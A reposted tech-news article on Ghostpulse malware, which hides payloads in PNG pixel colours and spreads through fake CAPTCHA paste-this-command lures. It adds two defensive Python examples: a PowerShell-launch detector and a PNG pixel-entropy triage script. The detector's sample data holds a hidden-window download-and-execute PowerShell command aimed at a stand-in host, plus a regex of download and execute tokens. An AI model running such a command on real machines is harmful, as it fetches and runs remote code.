This sneaky Ghostpulse malware hides in PNG image files
Date:
Tue, 22 Oct 2024 16:03:00 +0000
Description:
Ghostpulse malware appears to have greatly evolved over the last two years.
FULL STORY ======================================================================
Cybersecurity researchers from Elastic Security have uncovered a new version of the infamous Ghostpulse malware hiding in the pixels of a .PNG file.
In their technical write-up, the researchers explained that the malware's operators continue to demonstrate incredible levels of creativity and knowledge, as they find new ways to distribute the malware and hide it from antivirus programs and endpoint protection solutions.
The move marks a major shift from Ghostpulse's previous obfuscation technique, which included abusing the IDAT chunk of PNG files to hide malicious payloads, it was said.
Reading PNG files
To infect the victim with the malware, the crooks would first use social engineering to trick the victim into visiting an attacker-controlled website. There, the visitor would be presented with what appeared to be a standard CAPTCHA. However, instead of being shown images of a dog or a fire hydrant, the visitor is asked to press a specific keyboard shortcut, which copies a malicious piece of JavaScript code into the clipboard.
That code triggers a PowerShell script that downloads and runs the Ghostpulse payload.
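The first stage of the chain above (a lure page that gets the user to paste a command that launches PowerShell) leaves a recognisable trace in endpoint telemetry: a PowerShell process whose parent is the interactive shell (explorer.exe, which owns the Run dialog) and whose command line carries hidden-window, encoded-command or download-and-execute tokens. The following is an added detection example written for this article; it is not code from Elastic Security, TechRadar or the malware write-up. The event records, their Sysmon-like field names (ParentImage, Image, CommandLine) and the command-line values are constructed for illustration, and the token list is a generic heuristic, not a signature for this campaign.

```python
import re

# Constructed sample of process-creation records in a Sysmon-like shape.
# Field names and values are assumptions for this example, not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('http://lure.invalid/p')\""},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -EncodedCommand QUJD..."},   # constructed placeholder blob
]

# A Win+R / Run-dialog launch shows up as a child of the interactive shell.
INTERACTIVE_SHELL_PARENTS = ("explorer.exe",)

# Generic command-line tokens that are rare in legitimate interactive use.
SUSPICIOUS_CMD = re.compile(
    r"(-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)\b|iex\b|invoke-expression|"
    r"downloadstring|downloadfile|invoke-webrequest|invoke-restmethod)",
    re.IGNORECASE,
)


def score_event(ev):
    """Return the reasons a record looks like a paste-into-Run PowerShell launch ([] if none)."""
    reasons = []
    parent = ev.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    image = ev.get("Image", "").lower().rsplit("\\", 1)[-1]
    if image not in ("powershell.exe", "pwsh.exe"):
        return reasons
    if parent in INTERACTIVE_SHELL_PARENTS:
        reasons.append("powershell spawned directly by explorer.exe (Run dialog / Win+R)")
    hits = sorted({m.group(0).lower() for m in SUSPICIOUS_CMD.finditer(ev.get("CommandLine", ""))})
    if hits:
        reasons.append("suspicious command-line tokens: " + ", ".join(hits))
    return reasons


def find_suspicious(events, min_reasons=2):
    """Indices and reasons for records meeting at least min_reasons signals
    (default 2: both the explorer.exe parent and a suspicious command line)."""
    flagged = []
    for i, ev in enumerate(events):
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            flagged.append((i, reasons))
    return flagged


if __name__ == "__main__":
    for i, reasons in find_suspicious(SAMPLE_EVENTS):
        print("event %d: %s" % (i, "; ".join(reasons)))
```

Requiring both signals keeps a developer's build script (PowerShell launched from an editor) and an ordinary Run-dialog launch of notepad out of the alert, while the two constructed explorer-spawned PowerShell records with hidden-window, download or encoded-command tokens are flagged.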
The payload is a single file: a benign but compromised executable that includes a PNG file within its resources section. The malware works by looking at specific pixels and reading their color values to collect information hidden inside. The colors are broken into small chunks of data, which are then checked using a type of math test to see if they contain hidden malware instructions.
If they pass the test, the malware gathers the information and uses XOR to decode the hidden instructions, ultimately infecting the endpoint.
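An encrypted payload written into pixel color values has a property that ordinary image content lacks: the decoded pixel bytes in the region carrying it look like random data. The following is an added analysis example for this article, not code from Elastic Security, TechRadar or the malware itself; it decodes a PNG with the standard library only, verifies every chunk CRC, undoes the per-row PNG filters, and reports the Shannon entropy of the pixel bytes band by band. The decoder is deliberately limited to 8-bit, non-interlaced RGB/RGBA images, and the 16x16 test image is constructed in code (flat grey top half, pseudo-random bottom half standing in for an embedded payload). The per-band entropy check is a generic triage heuristic for images extracted from a resource section; it is not the malware's own "math test", which the article does not detail.

```python
import math
import random
import struct
import zlib
from collections import Counter

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def png_chunks(data):
    """Yield (type, payload) for every chunk, verifying each chunk's CRC on the way."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIG)
    while pos < len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError("CRC mismatch in chunk %r" % ctype)
        yield ctype, payload
        pos += 12 + length


def decode_rgb8(data):
    """Decode a non-interlaced 8-bit RGB/RGBA PNG into (width, height, bpp, rows of pixel bytes)."""
    width = height = bpp = None
    idat = b""
    for ctype, payload in png_chunks(data):
        if ctype == b"IHDR":
            width, height, depth, colour, _, _, interlace = struct.unpack(">IIBBBBB", payload)
            if depth != 8 or colour not in (2, 6) or interlace != 0:
                raise ValueError("example decoder handles 8-bit RGB/RGBA, non-interlaced only")
            bpp = 3 if colour == 2 else 4
        elif ctype == b"IDAT":
            idat += payload
    raw = zlib.decompress(idat)
    stride = width * bpp
    rows, prev = [], bytearray(stride)
    for y in range(height):
        off = y * (stride + 1)
        ftype, line = raw[off], bytearray(raw[off + 1:off + 1 + stride])
        for i in range(stride):                       # undo the per-row PNG filter
            a = line[i - bpp] if i >= bpp else 0      # left neighbour (already reconstructed)
            b = prev[i]                               # byte above
            c = prev[i - bpp] if i >= bpp else 0      # upper-left
            if ftype == 1:                            # Sub
                line[i] = (line[i] + a) & 0xFF
            elif ftype == 2:                          # Up
                line[i] = (line[i] + b) & 0xFF
            elif ftype == 3:                          # Average
                line[i] = (line[i] + (a + b) // 2) & 0xFF
            elif ftype == 4:                          # Paeth
                p = a + b - c
                pa, pb, pc = abs(p - a), abs(p - b), abs(p - c)
                pred = a if (pa <= pb and pa <= pc) else (b if pb <= pc else c)
                line[i] = (line[i] + pred) & 0xFF
        rows.append(bytes(line))
        prev = line
    return width, height, bpp, rows


def shannon_entropy(buf):
    """Bits of entropy per byte: ~0 for flat colour, close to 8 for encrypted or compressed data."""
    n = len(buf)
    if n == 0:
        return 0.0
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values())


def pixel_entropy_by_band(png, band_rows=8):
    """Entropy of the decoded pixel bytes for each horizontal band of band_rows rows.
    A band whose colour channels carry an encrypted payload stands out from image content."""
    _, height, _, rows = decode_rgb8(png)
    return [round(shannon_entropy(b"".join(rows[y:y + band_rows])), 2)
            for y in range(0, height, band_rows)]


def make_png_rgb(width, rows, filter_type=0):
    """Encode rows of width*3 bytes as an RGB PNG using filter 0 (None) or 1 (Sub). Constructed."""
    def chunk(ctype, payload):
        crc = struct.pack(">I", zlib.crc32(ctype + payload) & 0xFFFFFFFF)
        return struct.pack(">I", len(payload)) + ctype + payload + crc

    def sub_filter(r):
        return bytes((r[i] - (r[i - 3] if i >= 3 else 0)) & 0xFF for i in range(len(r)))

    body = b"".join(bytes([filter_type]) + (sub_filter(r) if filter_type == 1 else r) for r in rows)
    ihdr = struct.pack(">IIBBBBB", width, len(rows), 8, 2, 0, 0, 0)
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", zlib.compress(body)) + chunk(b"IEND", b"")


def build_sample_png(filter_type=0):
    """Constructed 16x16 image: flat grey top half, pseudo-random bottom half
    standing in for an encrypted payload written into the pixel colours."""
    width = 16
    rows = [bytes([200, 200, 200]) * width] * 8
    rng = random.Random(7)
    rows += [bytes(rng.randrange(256) for _ in range(width * 3)) for _ in range(8)]
    return make_png_rgb(width, rows, filter_type)


if __name__ == "__main__":
    for i, e in enumerate(pixel_entropy_by_band(build_sample_png())):
        print("rows %2d-%2d: %.2f bits/byte" % (i * 8, i * 8 + 7, e))
```

On the constructed image the flat band scores 0 bits per byte and the payload band scores well above 6, which is the kind of contrast worth a closer look when a PNG pulled from an executable's resources has no reason to contain noise-like regions. Because the decoder checks chunk CRCs, a PNG whose IDAT data has been tampered with without recomputing the CRC fails early instead of decoding silently.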
Ghostpulse is usually used as a loader, deploying more dangerous malware to the compromised systems. Elastic Security found that most of the time, the crooks use it to deploy the Lumma infostealer.
Via The Register
======================================================================
Link to news story:
https://www.techradar.com/pro/security/this-sneaky-ghostpulse-malware-hides-in-png-image-files
--- Mystic BBS v1.12 A47 (Linux/64)
* Origin: tqwNet Technology News (1337:1/100)